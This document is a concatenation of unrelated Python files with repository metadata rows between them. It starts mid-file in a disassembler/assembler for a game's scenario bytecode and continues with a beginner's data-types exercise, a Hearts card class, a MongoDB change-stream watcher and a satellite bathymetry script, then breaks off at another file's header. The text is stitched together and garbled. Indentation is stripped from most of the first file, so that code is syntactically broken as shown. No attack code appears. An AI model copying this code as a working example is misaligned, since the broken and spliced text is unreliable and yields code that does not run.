fs.seek(pos + length)
ins.Operand = [target, tid, block]
return ins
elif data.Reason == HANDLER_REASON_FORMAT:
'''
def lambda_xxx():
OP_97(0xFE, 0x7D0, 0x0, 0x0, 0x7D0, 0x0)
OP_00()
X(ChrId, ChrThreadId, lambda_xxx)
'''
ins = data.Instruction
entry = data.TableEntry
target, tid, lambdablock = ins.Operand
lambda_name = 'lambda_%X' % lambdablock.Offset
txt = ['', 'def %s():' % lambda_name]
for inst in lambdablock.Instructions:
lambdadata = data.CreateBranch()
lambdadata.Instruction = inst
lambdabody = lambdadata.Format(lambdadata)
for i in range(len(lambdabody)):
if lambdabody[i] == '':
continue
lambdabody[i] = ' ' + lambdabody[i]
txt += lambdabody
txt.append('')
txt.append('%s(0x%X, %d, %s)' % (data.TableEntry.OpName, target, tid, lambda_name))
return txt
elif data.Reason == HANDLER_REASON_ASSEMBLE:
fs = data.FileStream
entry = data.TableEntry
inst = data.Instruction
target, tid, lambdafunc = data.Arguments
entry.Container.WriteOpCode(fs, inst.OpCode)
entry.WriteOperand(data, 'W', target)
entry.WriteOperand(data, 'B', tid)
fs.seek(1, io.SEEK_CUR)
pos = fs.tell()
lambdafunc()
pos2 = fs.tell()
if pos2 - pos > 0xFF:
raise Exception('lambda must be smaller than 0x100 bytes: current = %X' % (pos2 - pos))
fs.seek(pos - 1)
entry.WriteOperand(data, 'B', pos2 - pos - extra_length)
fs.seek(pos2)
return inst
def scp_46(data):
return scp_lambda_worker(data, 1) # ExitThread
def scp_47(data):
return scp_lambda_worker(data, 1 + 5) # Yield, Jump(Offset)
def scp_4e(data):
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
ins = data.Instruction
ins.Operand = data.TableEntry.GetAllOperand('W', fs)
ins.Operand.append(ParseScpExpression(data))
ins.OperandFormat = 'WE'
return ins
elif data.Reason == HANDLER_REASON_ASSEMBLE:
data.Instruction.OperandFormat = 'WE'
def scp_50(data):
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
ins = data.Instruction
ins.Operand.append(fs.byte())
ins.Operand.append(ParseScpExpression(data))
ins.OperandFormat = 'BE'
return ins
elif data.Reason == HANDLER_REASON_ASSEMBLE:
data.Instruction.OperandFormat = 'BE'
def scp_52(data):
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
ins = data.Instruction
ins.Operand = data.TableEntry.GetAllOperand('WB', fs)
ins.Operand.append(ParseScpExpression(data))
ins.OperandFormat = 'WBE'
return ins
elif data.Reason == HANDLER_REASON_ASSEMBLE:
data.Instruction.OperandFormat = 'WBE'
def scp_anonymous_talk(data):
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
ins = data.Instruction
target, text = data.TableEntry.GetAllOperand('WS', fs)
ins.Operand.append(target)
ins.Operand.append(text)
ins.OperandFormat = 'WS'
return ins
elif data.Reason == HANDLER_REASON_FORMAT:
return FormatFuncString(data, data.Instruction.OperandFormat)
elif data.Reason == HANDLER_REASON_ASSEMBLE:
data.Instruction.OperandFormat = 'WS'
def scp_create_chr_talk(data):
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
ins = data.Instruction
ins.Operand = data.TableEntry.GetAllOperand('WS', fs)
ins.OperandFormat = 'WS'
return ins
elif data.Reason == HANDLER_REASON_FORMAT:
return FormatFuncString(data, data.Instruction.OperandFormat)
elif data.Reason == HANDLER_REASON_ASSEMBLE:
data.Instruction.OperandFormat = 'WS'
def scp_create_npc_talk(data):
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
ins = data.Instruction
target, name, text = data.TableEntry.GetAllOperand('WSS', fs)
ins.Operand.append(target)
ins.Operand.append(name)
ins.Operand.append(text)
ins.OperandFormat = 'WSS'
return ins
elif data.Reason == HANDLER_REASON_FORMAT:
return FormatFuncString(data, data.Instruction.OperandFormat)
elif data.Reason == HANDLER_REASON_ASSEMBLE:
data.Instruction.OperandFormat = 'WSS'
def scp_create_menu(data):
# max 10 line ?
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
ins = data.Instruction
ins.Operand = data.TableEntry.GetAllOperand('hhhc', fs)
menuitems = data.TableEntry.GetOperand('S', fs)
ins.Operand.append(menuitems)
ins.OperandFormat = 'hhhcS'
return ins
elif data.Reason == HANDLER_REASON_FORMAT:
return FormatFuncString(data, data.Instruction.OperandFormat, -1)
elif data.Reason == HANDLER_REASON_ASSEMBLE:
data.Instruction.OperandFormat = 'hhhcS'
def scp_76(data):
def getopr(opr3):
operand = ''
if opr3 == 0 or \
opr3 == 1 or \
opr3 == 3:
operand = 'L'
elif opr3 == 2:
operand = 'S'
return operand
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
ins = data.Instruction
ins.Operand = data.TableEntry.GetAllOperand('BSB', fs)
opr3 = ins.Operand[2]
operand = getopr(opr3)
ins.Operand += data.TableEntry.GetAllOperand(operand, fs)
ins.OperandFormat = 'BSB' + operand
return ins
elif data.Reason == HANDLER_REASON_ASSEMBLE:
opr3 = data.Arguments[2]
data.Instruction.OperandFormat = 'BSB' + getopr(opr3)
def scp_set_event_skip(data):
if data.Reason == HANDLER_REASON_DISASM:
ins = data.Instruction
fs = data.FileStream
cleareventskip, offset = data.TableEntry.GetAllOperand('BL', fs)
ins.OperandFormat = 'BL' if cleareventskip else 'BO'
ins.Operand = [cleareventskip, offset]
if not cleareventskip:
ins.BranchTargets.append(offset)
return ins
elif data.Reason == HANDLER_REASON_ASSEMBLE:
ins = data.Instruction
cleareventskip, offset = data.Arguments[0], data.Arguments[1]
ins.OperandFormat = 'BL' if cleareventskip else 'BO'
def scp_9f(data):
def getopr(opr):
if opr == 0:
operand = 'W'
elif opr == 1:
operand = 'iii'
else:
operand = 'WiB'
return operand
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
ins = data.Instruction
ins.Operand = data.TableEntry.GetAllOperand('B', fs)
opr = ins.Operand[0]
operand = getopr(opr)
ins.Operand += data.TableEntry.GetAllOperand(operand, fs)
ins.OperandFormat = 'B' + operand
return ins
elif data.Reason == HANDLER_REASON_ASSEMBLE:
data.Instruction.OperandFormat = 'B' + getopr(data.Arguments[0])
def scp_a1(data):
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
ins = data.Instruction
ins.Operand = data.TableEntry.GetAllOperand('WWB', fs)
operand = 'B' * ins.Operand[-1]
ins.Operand += data.TableEntry.GetAllOperand(operand, fs)
ins.OperandFormat = 'WWB' + operand
return ins
elif data.Reason == HANDLER_REASON_ASSEMBLE:
data.Instruction.OperandFormat = 'WWB' + 'B' * (len(data.Arguments) - 3)
return None
def MakeScenarioFlags(offset, bit):
return (offset << 3) | (bit & 7)
def SplitScenarioFlags(flags):
return (flags >> 3), (flags & 7)
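# Worked example (for illustration): MakeScenarioFlags(0x40, 3) == (0x40 << 3) | 3 == 0x203,
# and SplitScenarioFlags(0x203) == (0x40, 3) recovers the byte offset and bit index.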
def scp_set_scenario_flags(data):
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
ins = data.Instruction
offset, bit = SplitScenarioFlags(data.TableEntry.GetOperand('W', fs))
ins.Operand = [offset, bit]
ins.OperandFormat = 'WC'
return ins
elif data.Reason == HANDLER_REASON_ASSEMBLE:
data.Instruction.OperandFormat = 'W'
if len(data.Arguments) == 2:
offset, bit = data.Arguments[0], data.Arguments[1]
if offset >= 0x220:
raise Exception('offset must be less than 0x220')
data.Arguments = [MakeScenarioFlags(offset, bit)]
def scp_clear_scenario_flags(data):
return scp_set_scenario_flags(data)
def scp_cf(data):
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
ins = data.Instruction
operand = 'BB'
ins.Operand = data.TableEntry.GetAllOperand(operand, fs)
if ins.Operand[0] != 0:
ins.Operand += data.TableEntry.GetAllOperand('B', fs)
operand += 'B'
ins.OperandFormat = operand
return ins
elif data.Reason == HANDLER_REASON_ASSEMBLE:
data.Instruction.OperandFormat = 'BB' + ('B' if data.Arguments[0] != 0 else '')
def scp_menu_cmd(data):
def getopr(menutype):
operand = ''
if menutype == 0: pass
elif menutype == 1: operand = 'S'
elif menutype == 2: operand = 'hhC'
elif menutype == 3: operand = 'B'
elif menutype == 4: operand = 'B'
elif menutype == 5: operand = 'B'
elif menutype == 6: pass
return operand
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
        ins = data.Instruction
menutype, layer = data.TableEntry.GetAllOperand('BC', fs)
ins.Operand.append(menutype)
ins.Operand.append(layer)
operand = getopr(menutype)
ins.Operand += data.TableEntry.GetAllOperand(operand, fs)
ins.OperandFormat = 'CC' + operand
return ins
elif data.Reason == HANDLER_REASON_ASSEMBLE:
data.Instruction.OperandFormat = 'BB' + getopr(data.Arguments[0])
def scp_d2(data):
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
ins = data.Instruction
ins.Operand.append(fs.byte())
ins.Operand.append(ParseScpExpression(data))
ins.OperandFormat = 'BE'
return ins
elif data.Reason == HANDLER_REASON_ASSEMBLE:
data.Instruction.OperandFormat = 'BE'
def scp_load_chr(data):
if data.Reason == HANDLER_REASON_DISASM:
data.Instruction.OperandFormat = 'LB'
elif data.Reason == HANDLER_REASON_FORMAT:
ins = data.Instruction
return ['%s("%s", 0x%X)' % (data.TableEntry.OpName, ScenarioChipInfo(ins.Operand[0]), ins.Operand[1])]
elif data.Reason == HANDLER_REASON_ASSEMBLE:
data.Arguments[0] = ScenarioChipInfo(data.Arguments[0]).fileindex()
data.Instruction.OperandFormat = 'LB'
def scp_e4(data):
def getopr(opr):
operand = ''
if opr == 0: operand = 'BB'
elif opr == 1: operand = 'B'
elif opr == 2: operand = 'B'
elif opr == 3: pass
return operand
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
ins = data.Instruction
opr = data.TableEntry.GetOperand('B', fs)
ins.Operand.append(opr)
operand = getopr(opr)
ins.Operand += data.TableEntry.GetAllOperand(operand, fs)
ins.OperandFormat = 'B' + operand
return ins
elif data.Reason == HANDLER_REASON_ASSEMBLE:
data.Instruction.OperandFormat = 'B' + getopr(data.Arguments[0])
edao_op_list = \
[
inst(ExitThread),
inst(Return, NO_OPERAND, INSTRUCTION_END_BLOCK),
inst(Jc, NO_OPERAND, INSTRUCTION_START_BLOCK, scp_if),
inst(Jump, 'O', INSTRUCTION_JUMP),
inst(Switch, NO_OPERAND, INSTRUCTION_END_BLOCK, scp_switch),
inst(Call, 'CC'), # Call(scp index, func index)
inst(NewScene, NO_OPERAND, 0, scp_new_scene),
inst(IdleLoop),
inst(Sleep, 'H'),
inst(SetMapFlags, 'L'),
inst(ClearMapFlags, 'L'),
inst(FadeToDark, 'iic'),
inst(FadeToBright, 'ii'),
inst(OP_0D),
inst(Fade, 'I'),
inst(Battle, NO_OPERAND, 0, scp_battle),
inst(OP_10, 'BB'),
inst(OP_11, 'BBBLLL'),
inst(StopSound, 'HHC'),
inst(OP_13, 'W'), # poswnd
inst(BlurSwitch, 'WLWBW'),
inst(CancelBlur, 'I'),
inst(OP_16, 'B'),
inst(ShowSaveMenu),
inst(EventBegin, 'B'),
inst(EventEnd, 'B'),
inst(OP_1B, 'BBW'),
inst(OP_1C, 'BBBBBBWW'),
inst(SetBarrier, NO_OPERAND, 0, scp_1d), # see scp_1d
inst(PlayBGM, 'MC'),
inst(OP_1F),
inst(VolumeBGM, 'BL'),
inst(OP_21, 'L'),
inst(WaitBGM),
inst(Sound, 'HCCC'),
inst(OP_24, 'W'),
inst(OP_25, 'WB'),
inst(SoundDistance, 'WLLLLLBL'),
inst(SoundLoad, 'H'),
inst(Yield),
inst(OP_29, NO_OPERAND, 0, scp_29),
inst(OP_2A, NO_OPERAND, 0, scp_2a),
inst(OP_2B, NO_OPERAND, 0, scp_2b),
inst(OP_2C, 'WW'),
inst(OP_2D, 'WW'),
inst(AddParty, 'BBB'),
inst(RemoveParty, 'BB'),
inst(ClearParty),
inst(OP_31, 'B'),
inst(OP_32, 'BBW'),
inst(RemoveCraft, 'BW'),
inst(AddCraft, 'BW'),
inst(OP_37),
inst(OP_38, NO_OPERAND, 0, scp_38),
inst(AddSepith, 'BH'), # AddSepith(0~6 or 0xFF, number)
inst(SubSepith, 'BH'),
inst(AddMira, 'H'),
inst(SubMira, 'H'),
inst(OP_3D, 'W'),
inst(OP_3E, 'W'),
inst(AddItemNumber, 'Th'),
inst(SubItemNumber, 'Th'),
inst(GetItemNumber, 'TB'),
inst(OP_42, 'BWB'),
inst(GetPartyIndex, 'B'), # GetPartyIndex(chr_id) return chr index of team member
inst(BeginChrThread, 'WCCC'),
inst(EndChrThread, 'WB'),
inst(QueueWorkItem, NO_OPERAND, 0, scp_46),
inst(QueueWorkItem2, NO_OPERAND, 0, scp_47),
inst(WaitChrThread, 'WC'),
inst(OP_49),
inst(Event, 'CC'),
inst(OP_4B, 'WB'),
inst(OP_4C, 'WB'),
inst(OP_4D),
inst(RunExpression, NO_OPERAND, 0, scp_4e),
inst(OP_4F),
inst(OP_50, NO_OPERAND, 0, scp_50),
inst(OP_51),
inst(OP_52, NO_OPERAND, 0, scp_52),
inst(TalkBegin, 'W'),
inst(TalkEnd, 'W'),
inst(AnonymousTalk, NO_OPERAND, 0, scp_anonymous_talk),
inst(OP_56),
inst(OP_57, 'B'),
inst(MenuTitle, 'hhhS'),
inst(CloseMessageWindow),
inst(OP_5A),
inst(SetMessageWindowPos, 'hhhh'), # SetMessageWindowPos(x, y, -1, -1)
inst(ChrTalk, NO_OPERAND, 0, scp_create_chr_talk),
inst(NpcTalk, NO_OPERAND, 0, scp_create_npc_talk),
inst(Menu, NO_OPERAND, 0, scp_create_menu),
inst(MenuEnd, 'W'),
inst(OP_60, 'W'),
inst(SetChrName, 'S'),
inst(OP_62, 'W'),
inst(OP_63, 'WLIBBLB'),
inst(OP_64, 'W'),
inst(OP_65, 'BW'),
inst(OP_66, 'BW'),
inst(OP_67, 'W'),
inst(OP_68, 'iiii'),
inst(OP_69, 'BW'),
inst(OP_6A, 'WL'),
inst(OP_6B, 'W'),
inst(SetCameraDistance, 'ii'), # SetCameraDistance(distance, duration)
inst(MoveCamera, 'hhhi'), # MoveCamera(horizon, vertical, obliquity, duration)
inst(OP_6E, 'ii'),
inst(OP_6F, 'B'),
inst(OP_70, 'BW'),
inst(OP_71, 'BWWWL'),
inst(SetMapObjFlags, 'BL'),
inst(ClearMapObjFlags, 'BL'),
inst(OP_74, 'WB'),
inst(OP_75, 'BBL'),
inst(SetMapObjFrame, NO_OPERAND, 0, scp_76),
inst(OP_77, 'BW'),
inst(OP_78, 'BW'),
inst(OP_79, 'W'),
inst(SetEventSkip, NO_OPERAND, INSTRUCTION_START_BLOCK, scp_set_event_skip),
inst(OP_7B, 'B'),
inst(OP_7D, 'BBBBL'),
inst(OP_82, 'LLLL'),
inst(SetChrChip, 'BWWW'),
inst(OP_84, 'BB'),
inst(LoadEffect, 'BS'),
inst(PlayEffect, 'BBWWiiihhhiiiwiiii'),
inst(OP_87, 'BBBSWLLLWWWLLLL'),
inst(StopEffect, 'BB'),
inst(OP_89, 'BB'),
inst(OP_8A, 'B'),
inst(OP_8B, 'W'),
inst(SetChrChipByIndex, 'WB'),
inst(SetChrSubChip, 'WB'),
inst(OP_8E, 'WS'),
inst(SetChrPos, 'WiiiH'),
inst(OP_90, 'Wiiih'),
inst(TurnDirection, 'WWH'),
inst(OP_92, 'WLLW'),
inst(OP_93, 'WWW'),
inst(OP_94, 'WLLLLL'),
inst(OP_95, 'WiiiiB'),
inst(OP_96, 'WLLLLB'),
inst(OP_97, 'WLLLLB'),
inst(OP_98, 'WLLLLB'),
inst(OP_99, 'WWLLB'),
inst(OP_9A, 'WWLLB'),
inst(OP_9B, 'BWWLLB'),
inst(OP_9C, 'WLLLLL'),
inst(OP_9D, 'WLLLLL'),
inst(OP_9E, 'WLLLLW'),
inst(OP_9F, NO_OPERAND, 0, scp_9f),
inst(OP_A0, 'WHBB'),
inst(OP_A1, NO_OPERAND, 0, scp_a1),
inst(SetChrFlags, 'WW'),
inst(ClearChrFlags, 'WW'),
inst(SetChrBattleFlags, 'WW'),
inst(ClearChrBattleFlags, 'WW'),
inst(OP_A6, 'WLLLL'),
inst(OP_A7, 'WBBBBL'),
inst(OP_A8, 'WBBBL'),
inst(SetScenarioFlags, NO_OPERAND, 0, scp_set_scenario_flags),
inst(ClearScenarioFlags, NO_OPERAND, 0, scp_clear_scenario_flags),
inst(OP_AB, 'W'),
inst(OP_AC, 'W'),
inst(OP_AD, 'W'),
inst(OP_AE, 'WW'),
inst(OP_AF, 'B'),
inst(OP_B2, 'W'),
inst(OutputDebugInt, 'B'),
inst(OP_B4, 'B'),
inst(OP_B5, 'BW'),
inst(LoadOps), # obsolete
inst(ModifyEventFlags, 'CCW'), # ModifyEventFlags(set_or_clear, event_index, flags) 0: set, 1: clear
inst(PlayMovie, 'BSWW'),
inst(OP_B9, 'B'),
inst(ReplaceBGM, 'MM'),
inst(OP_BC, 'B'),
inst(UseItem, 'WW'),
inst(OP_BE, 'BW'),
inst(OP_BF, 'BB'),
inst(SetChrChipPat, 'BBL'), # SetChrChipPat(chr_id, func_id, param)
inst(LoadChrChipPat),
inst(OP_C3, 'BBWWWBiiiiii'),
inst(OP_C4, 'BBWW'),
inst(MiniGame, 'BLLLLLLLL'),
inst(OP_C7, 'BB'),
inst(OP_C9, 'BL'),
inst(CreatePortrait, 'CHHHHHHHHHHHHLBS'),
inst(OP_CB, 'BBLLLL'),
inst(OP_CC, 'BBB'),
inst(PlaceName2, 'hhSBh'), # PlaceName2(x, y, itp_name, 0, duration)
inst(PartySelect, 'C'), # PartySelect(0 = select menu, save = 1, restore = 2)
inst(OP_CF, NO_OPERAND, 0, scp_cf),
inst(MenuCmd, NO_OPERAND, 0, scp_menu_cmd),
inst(OP_D1, 'W'),
inst(OP_D2, NO_OPERAND, 0, scp_d2),
inst(OP_D3, 'WBS'),
inst(OP_D4, 'LL'),
inst(OP_D5, 'WLLLL'),
inst(LoadChrToIndex, NO_OPERAND, 0, scp_load_chr),
inst(OP_D7, 'B'),
inst(OP_D8, 'BB'),
inst(OP_D9, 'BB'),
inst(OP_DA, 'B'),
inst(OP_DC, 'B'),
inst(OP_DD),
inst(OP_DE, 'S'),
inst(LoadAnimeChip, 'WBB'),
inst(OP_E0, 'BB'),
inst(OP_E2, 'B'),
inst(OP_E3, 'LLL'),
inst(OP_E4, NO_OPERAND, 0, scp_e4),
inst(OP_E5, 'B'),
inst(OP_E6, 'BBBBBBL'),
inst(OP_E7),
inst(OP_E8),
inst(ShowSaveClearMenu),
inst(OP_F0, 'BW'),
inst(OP_F3, 'i'),
inst(OP_F4, 'B'),
inst(OP_FA, 'W'),
inst(OP_FB, 'WB'),
inst(OP_FC, 'W'),
inst(OP_FD, 'WW'),
inst(OP_FE, 'B'),
inst(OP_FF, 'BLLL'),
]
del inst
for op in edao_op_list:
edao_op_table[op.OpCode] = op
op.Container = edao_op_table
'''
MenuCmd(0x0, 1)
cmd: 0 = create
layer: 1
MenuCmd(0x1, 1, '莉夏')
cmd: 1 = add item
layer: 1
text:
MenuCmd(0x2, 1, 15, 45, 0x1)
cmd: 2 = show
layer: 1
x: 15
y: 45
unknown: 1
Bond (羁绊)
OP_50(chr_offset, (scpexpr(EXPR_PUSH_LONG, const), scpexpr(EXPR_ADD_SAVE), scpexpr(EXPR_END)))
0x64: 琪雅
0x65: 艾莉
0x66: 缇欧
0x67: 兰迪
0x68: 诺艾尔
0x69: 瓦吉
0x6A: 莉夏
0x6C: 伊莉娅
0x6D: 塞茜尔
0x6E: 芙兰
0x6F: 修利
'''
if __name__ == '__main__':
valid = 0
for inst in edao_op_list:
if inst.OpName[:3] != 'OP_':
valid += 1
print('known: %d (%d%%)' % (valid, valid / len(edao_op_list) * 100))
print('total: %d' % len(edao_op_list))
input()
|
[
"Hiromi.Kaede@gmail.com"
] |
Hiromi.Kaede@gmail.com
|
c75be62d48e1e7fccfa5287f481f7b78ab92666a
|
22b14855ddbe3b2ab6d35e0698b19cd494a1d44f
|
/models/__init__.py
|
fc4f78da65dea698346e9473caf7bd88ec3de44f
|
[] |
no_license
|
felicia126/pytorch-semantic-segmentation
|
810825622c9133c020ae3ba8bc6afd138e470224
|
8a524d1fa428b6f2e5c08f1818de03ce6be25be0
|
refs/heads/master
| 2020-06-25T20:48:01.038889
| 2017-06-09T05:52:48
| 2017-06-09T05:52:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 101
|
py
|
from fcn16 import *
from fcn32 import *
from fcn8 import *
from seg_net import *
from u_net import *
|
[
"mldzj123@gmail.com"
] |
mldzj123@gmail.com
|
175e8207d56f5e176fe01f5da9e8e3596f826d8b
|
b1c35226c198c3225c4efe5e87bbeaee880d9ec9
|
/Assignment Module 1/py_module01.py
|
1e564fac216067bbc2c937b22d26fa0147a70db7
|
[] |
no_license
|
shubhrock777/Python-basic-code-
|
fb054f9051edf34b026c4596237040e75eb351cf
|
0716dd1a7aa7c6d2c4197e48694e6025c524541a
|
refs/heads/main
| 2023-06-01T02:09:38.805179
| 2021-07-03T15:48:07
| 2021-07-03T15:48:07
| 379,822,075
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,240
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Mon Jan 11 13:58:56 2021
@author: SHBHAM
"""
############### Assignment 01 Data types ################
###########Q 1
list_a = [7, 8, 1.5, "apple", "lemon", 57j, 85j, True, False]
list_b =["peanut", "coffee", 7, 1.5, 87, 9, 77j, False]
#a
list_ab= list_a + list_b
list_ab
#b
def frequency(list_ab):
    freq = {}
    for ele in list_ab:
        if ele in freq:
            freq[ele] += 1
        else:
            freq[ele] = 1
    return freq
frequency(list_ab)
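# Equivalent one-liner using the standard library, shown here only for comparison:
from collections import Counter
print(Counter(list_ab))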
#c
def reverse(list_ab):
new_list = list_ab[::-1]
return new_list
reverse(list_ab)
############Q 2
set_a={x for x in range(1,11)}
print(set_a)
set_b={x for x in range(5,16)}
print(set_b)
####a
common_elements = [ele for ele in set_a if ele in set_b]
print(common_elements)
####b
uniq_elements = [ele for ele in set_a if ele not in set_b] + [ele for ele in set_b if ele not in set_a]
print(uniq_elements)
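# The same two results can also be obtained with built-in set operations
# (shown only as an alternative sketch; note these return sets, not lists):
print(set_a & set_b)  # intersection, cf. common_elements
print(set_a ^ set_b)  # symmetric difference, cf. uniq_elements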
#####c
set_a.remove(7)
set_a
set_b.remove(7)
set_b
dic = {"State":('Kerala','Maharashtra','Uttar Pradesh','West Bengal','Chhattisgarh'),
"covid-19 cases":(760933,640045,60000,550000,280000)}
|
[
"noreply@github.com"
] |
shubhrock777.noreply@github.com
|
1dfe198703d96f33798ce50381e62f19fedbbab7
|
a9e126ef31c2aae4d9b3ac311b2d9661b8d42984
|
/src/python/Card.py
|
6a418c33ef30cf2c513073de0187c4d798c4e991
|
[] |
no_license
|
TechasitA/HeartsGameProject
|
d503749e96640d308fc8d4fbf83634764e26404d
|
8d2ef540f20345792a3577c6ec341a9029234fa7
|
refs/heads/master
| 2021-07-19T04:57:52.985325
| 2017-10-26T18:04:38
| 2017-10-26T18:04:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,801
|
py
|
class Card:
def __init__(self, card_face, card_rank, card_point):
self.card_face = card_face
self.card_rank = card_rank
self.card_point = card_point
class Cards:
def __init__(self):
self.all_card = [Card("2C", 1, 0), Card("2D", 1, 0), Card("2H", 1, 1), Card("2S", 1, 0)
, Card("3C", 2, 0), Card("3D", 2, 0), Card("3H", 2, 1), Card("3S", 2, 0)
, Card("4C", 3, 0), Card("4D", 3, 0), Card("4H", 3, 1), Card("4S", 3, 0)
, Card("5C", 4, 0), Card("5D", 4, 0), Card("5H", 4, 1), Card("5S", 4, 0)
, Card("6C", 5, 0), Card("6D", 5, 0), Card("6H", 5, 1), Card("6S", 5, 0)
, Card("7C", 6, 0), Card("7D", 6, 0), Card("7H", 6, 1), Card("7S", 6, 0)
, Card("8C", 7, 0), Card("8D", 7, 0), Card("8H", 7, 1), Card("8S", 7, 0)
, Card("9C", 8, 0), Card("9D", 8, 0), Card("9H", 8, 1), Card("9S", 8, 0)
, Card("TC", 9, 0), Card("TD", 9, 0), Card("TH", 9, 1), Card("TS", 9, 0)
, Card("JC", 10, 0), Card("JD", 10, 0), Card("JH", 10, 1), Card("JS", 10, 0)
, Card("QC", 11, 0), Card("QD", 11, 0), Card("QH", 11, 1), Card("QS", 11, 13)
, Card("KC", 12, 0), Card("KD", 12, 0), Card("KH", 12, 1), Card("KS", 12, 0)
, Card("AC", 13, 0), Card("AD", 13, 0), Card("AH", 13, 1), Card("AS", 13, 0)]
def get_rank(self, card_face):
for card in self.all_card:
if card.card_face == card_face:
return card.card_rank
def get_point(self, card_face):
for card in self.all_card:
if card.card_face == card_face:
return card.card_point
|
[
"techasit.a@ku.th"
] |
techasit.a@ku.th
|
52f5b9095b43499626a4a6321bae18fac50ec5a0
|
3c58ba2adb6117bcb97575ac856b0daf1ed85f3b
|
/if.py
|
c708b7776712f3fbc3791f57301515d6b605eb0b
|
[] |
no_license
|
yurulin1113/Python
|
e3abeafe64b9979f27a8546bdc66bc77bd508dd7
|
7b75e46a2f605b20d5ee3f3cc12b37729646e5bd
|
refs/heads/master
| 2022-12-02T09:42:38.990332
| 2020-08-21T10:11:13
| 2020-08-21T10:11:13
| 283,524,806
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 87
|
py
|
if True:
print(123)
print("hello")
num = 11
if(10 < num < 20):
print(exit())
|
[
"M0907150@o365.fcu.edu.tw"
] |
M0907150@o365.fcu.edu.tw
|
55cd26824257f1f561dfa6ab170668f5f9c881e9
|
6bf592542ebb071060c78e3a7f9370ac35acd5e3
|
/scripts/watchberead.py
|
65c32c050a2e4c0725af6b74120e2b559aa80446
|
[] |
no_license
|
DeathWish5/NDDBS
|
285800a9fbcc76b9475719deb278774cf8a963b1
|
a915bffdf3e7504fa7d15f74ee25690f6d687782
|
refs/heads/main
| 2023-05-21T09:30:18.353458
| 2021-06-06T09:57:18
| 2021-06-15T13:21:12
| 374,324,590
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 423
|
py
|
import pymongo
from pymongo import MongoClient
client = pymongo.MongoClient('mongodb://183.173.78.37:40000/')
db = client.ddbs
change_stream = db.beread.watch()
for change in change_stream:
# change = change['fullDocument']
# {"timestamp": xx, "id": xx, "uid": xx, "aid": xx, "readTimeLength": xx,
# "agreeOrNot": xx, "commentOrNot": xx, "shareOrNot": xx, "commentDetail": xx }
print("change: ", change)
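# A hedged variant (assumption, not part of the original script): pymongo's watch()
# also accepts an aggregation pipeline, so the stream could be narrowed before the
# loop above, e.g.
#   change_stream = db.beread.watch([{"$match": {"operationType": "insert"}}])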
|
[
"zyr_ms@outlook.com"
] |
zyr_ms@outlook.com
|
427472ba3d76f7c4f286f53df7b5d26a580ad917
|
2421c19633749806a4d81d7a85fdf3063e64f5ef
|
/main.py
|
7ecef279543bff227a48cee1accfa343597a8e58
|
[] |
no_license
|
chezhihua/BathyMetriceModel
|
cf7e3227538a82f63dba5f3cb8b923fd4a378e98
|
1eeaa3eb0507e49ad18d2a5c12316c676d0d49d8
|
refs/heads/main
| 2023-06-28T08:31:48.038852
| 2021-08-01T09:25:03
| 2021-08-01T09:25:03
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,348
|
py
|
# File :main_02.py
# Author :WJ
# Function :
# Time :2021/07/13
# Version :
# Amend :
import os, h5py
import time
import numpy as np
import pandas as pd
import SeaSurfaceAndSeaFloorDetection_0801 as detect
np.set_printoptions(suppress=True)
import Section as sction
import ReadH5 as readh5
from icecream import ic
if __name__ == '__main__':
bound = [111.59, 16.530, 111.62, 16.55]
# bound = [111.4, 16.430, 111.81, 16.61]
step1 = 1
step2 = 30
print("********************************************")
##
    # working directory
os.chdir(r'D:\Program Files\JetBrains\PycharmProjects\BathyMetriceModel\data0')
seasurface_all=[]
seafloor_all=[]
for hdf_file in os.listdir():
        for beam in ['gt1l', 'gt2l', 'gt3l']:  # process the three laser beams in turn
if hdf_file[-4:] == ".hdf" or hdf_file[-3:] == ".h5":
h5File = hdf_file
prefix = h5File + beam
print('------------------------------')
ic(prefix)
csv_ph= readh5.h5TOcsv(h5File,beam,bound=bound)
print(len(csv_ph))
if len(csv_ph)>1000:
ic(csv_ph)
# csv_ph.to_csv('../output/' + prefix + '_all.csv')
ic()
seaSurface, aboveSurface, underSurface, seaFloor1, seaFloor2, seaFloor3 = detect.surfaceAndFloorDetection(
csv_ph, step1, step2)
ic()
seasurface_all.extend(seaSurface.to_numpy())
seafloor_all.extend(seaFloor3.to_numpy())
ic()
# seaSurface.to_csv('../output/' + prefix + '_seaSurface.csv')
# seaFloor3.to_csv('../output/' + prefix + '_seaFloor_03.csv')
sction.Section_one(seaSurface, prefix + '_surface_' + str(step1) + '+' + str(step2))
sction.Section_one(seaFloor3, prefix + '_seafloor_' + str(step1) + '+' + str(step2))
print(len(seasurface_all))
seasurface_all=np.array(seasurface_all)
np.savetxt('../output/seasurface_all_0723.txt',seasurface_all,delimiter=',',fmt='%.03f')
print(len( seafloor_all))
seafloor_all = np.array(seafloor_all)
np.savetxt('../output/seafloor_all_0723.txt', seafloor_all, delimiter=',',fmt='%.03f')#,
|
[
"772066235@qq.com"
] |
772066235@qq.com
|
b489578b017710ed899ebfad438fb3b607cf8d4b
|
2837bb900c2abb8d7ba34d92a771c430aeef90c8
|
/begi 38.py
|
999d0c07d75cd5127bbd9196a8134981b099fb3b
|
[] |
no_license
|
Aravindandeva/Python-files
|
9e81919db80f18e28ac76f37bcb63ef3d7477db0
